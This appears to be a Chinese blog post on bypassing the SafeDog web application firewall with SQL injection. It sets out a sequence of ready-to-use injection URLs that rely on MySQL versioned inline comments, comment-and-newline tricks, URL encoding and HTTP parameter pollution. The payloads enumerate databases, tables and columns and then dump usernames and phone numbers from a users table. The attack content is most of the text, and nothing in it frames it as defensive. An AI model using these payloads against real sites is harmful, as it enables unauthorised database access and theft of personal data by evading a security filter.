首页 > 其他分享 >安全狗Bypass

安全狗Bypass

时间:2023-02-26 22:45:47浏览次数:26  
标签:name --+ 安全 Bypass test com id schema

安全狗Bypass

No.1 内联注释(/*![12345]*/)绕过方法:

  • /*!select*/: 相当于没有注释
  • /*!12345select*/: 当12345小于当前mysql版本号的时候,注释不生效,当大于版本号的时候注释生效。
  • /*![]*/: []中括号中的数字若填写则必须是5位

1,执行检测安全狗功能

http://test.com/test?id=1' or 1 and 1=1--+

拦截绕过方法:

http://test.com/test?id=1' or -1 and -1=-1--+

2,判断列数

http://test.com/test?id=1' or -1/*!11544order/*!11544by/*!11544*/1--+

3,联合查询绕过

http://test.com/test?id=1' or -1/*!11544union/*!11544select/*!115441,2,3,4,5,6*/--+

4,爆库

http://test.com/test?id=1' /*!11544union/*!11544select/*!115441,2,3,4,group_concat(schema_name),6*/from information_schema.schemata--+

5,表名

http://test.com/test?id=1' /*!11544union /*!11544select/*!115441,2,3,4,/*!11544group_concat(/*!11544table_name),6/*!11544from/*!11544information_schema.tables/*!11544where/*!11544table_schema=/*!11544database/*!11544()*/--+

6,列名

http://test.com/test?id=1' /*!11544union/*!11544select 1,2,3,4, 
group_concat(column_name),6 from information_schema.columns where 
table_schema in (database/*!11544()) and table_name in (0x7573657273)*/--+

7,获取内容

http://test.com/test?id=1' /*!11544union /*!11544select 1,2,3,4, group_concat(concat_ws(0x23,username,tel)),6 from users*/--+

内联注释

http://test.com/test?id=1' union/*!88888www.hacker.wang*/select 1,2,3,4,group_concat(column_name),6 from information_schema.columns where table_schema=database () and /*!88888www.hacker.wang*/table_name=0x7573657273 --+
 

mysql语法绕过

http://test.com/test?id=1' union -- www.hacker.wang%0aselect 1, 2,3,4, group_concat(column_name),6 from information_schema.columns where table_schema=database () and  -- www.hacker.wang%0a table_name=0x7573657273--+
 

url编码绕过

http://test.com/test?id=1' union/*%!a*/select 1,2,3,4, group_concat(column_name),6 from information_schema.columns where table_schema=database () and table_name in (0x7573657273) --+
 

HTTP参数污染绕过

http://test.com/test?id=1'/*&id=1'union select 1,2,3,4,group_concat(column_name),6 from information_schema.columns where table_schema=database() and table_name='users' --+*/

标签:name,--+,安全,Bypass,test,com,id,schema
From: https://www.cnblogs.com/cowpokee/p/17158056.html

相关文章

  • VSFTPD的基础安全加固
    与SSL配置相关的设置(要添加)ssl_enabe=YES|NO#是否启用sslssl_sslv2=YES|NO#是否激活sslv2加密ssl_sslv3=YES|NO#是否激活sslv3加密ssl_tlsv1=YES|NO#是否激活tl......
  • linux用户密码安全策略
    LinuxPAM模块类型linuxPAM配置文件/etc/pam.d/system-auth认证管理auth账号管理account密码管理 password会话管理session#%PAM-1.0#Thisfileisauto......
  • 信息安全之常见web漏洞原理危害防御方法
    一暴力破解概述:在web攻击中,一般会使用这种手段对应用系统的认证信息进行获取。其过程就是使用大量的认证信息在认证接口进行尝试登录,直到得到正确的结果。为了提高效率,......
  • 信息安全之linux服务器基线安全(等保要求参考)
    linux服务器基线安全(等保配置)备注:公司要求做服务器的基线安全配置,通过相关软件扫描出来结果,以下配置作为参考CU_OS_Linux_B_5.3.10_1限制root用户远程登录-telnet自动......
  • 信息安全之linux等保三级详细指导
    一、身份鉴别a)应对登录的用户进行身份标识和鉴别,身份标识具有唯一性,身份鉴别信息具有复杂度要求并定期更换;1、应核查用户在登陆时是否采用了身份鉴别措施;用户登录服务器......
  • Windows黑客编程之Bypass UAC
    描述用管理员权限运行CompMgmtLauncher.exe,由于它是白名单程序,不会被UAC拦截,可以直接以管理员权限运行CompMgmtLauncher的功能是去遍历指定注册表路径下的程序,并启动只......
  • JDBC-连接数据库 第三版 安全-2023-2-25
    避免Sql注入的问题。不用Statement而用PrepareStatement 预编译然后手工赋值setIntorsetString 插入:publicclassTestInsert{publicstaticvoidmain(......
  • 信息安全之windows服务器的基线安全(等保要求)
    windows服务器的基线安全(等保要求参考)下图是需要做基线配置的选项备注:具体都已经贴出来了,按照这个参考可以达标合格,有部分需要人工现场核实确认,这个要根据具体环境进行操......
  • 信息安全之基线管理与安全配置—Windows安全配置
    一、Windows安全配置简介二、账户配置根据需求可以进行相关配置(里面有说明)1、密码策略  密码最短期限:意思就是密码更改后,多少天内能再次更换密码2、用户权......
  • 【Java】ArrayList线程不安全的坑
    问题复现:使用Java的steam().paralleStream(),foreach()方法向ArrayList添加数据,导致ArrayList中出现空值,代码如下:publicstaticvoidmain(String[]args){......